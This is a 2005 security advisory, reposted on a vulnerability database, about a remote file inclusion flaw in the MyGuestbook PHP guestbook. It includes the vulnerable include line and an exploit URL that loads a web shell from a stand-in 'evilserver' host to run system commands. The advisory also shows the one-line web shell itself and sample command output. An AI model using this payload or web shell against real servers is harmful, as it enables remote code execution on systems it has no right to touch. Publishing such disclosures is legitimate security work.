Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:9071
HistoryJul 06, 2005 - 12:00 a.m.

MyGuestbook Remote File Inclusion.

2005-07-0600:00:00
vulners.com
10

===========================================================

============================================================
Title: MyGuestbook Remote File Inclusion.
Vulnerability Discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 05/07/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: 0.6.1 (Only Tested in 0.6.1)
Vendor: http://html-design.com/

============================================================

  • Summary *

This is a simple MySQL based Guestbook.


  • Problem Description *

The bug reside in form.inc.php3.

Vulnerable Code

<?
include("$lang.lang.inc.php3");
?>

/*

http://server/gb/form.inc.php3?lang=http://evilserver/cmd.gif?&cmd=id;uname&#37;20-a;uptime

uid=99(nobody) gid=99(nobody) groups=99(nobody) Linux cyan-1.farm.de
2.4.18custom_ko_w_ipsec #10 Fre Apr 19 13:05:46 CEST 2002 i686 unknown 6:51pm
up 463 days, 15:43, 0 users, load average: 0.00, 0.01, 0.02

*/

/*

cmd.gif

<?
system($cmd);
?>

*/



  • Fix *

Contact the Vendor.


  • References *

http://www.soulblack.com.ar/repo/papers/advisory/myguestbook_advisory.txt


  • Credits *

Vulnerability reported by SoulBlack Security Research

============================================================


SoulBlack - Security Research
http://www.soulblack.com.ar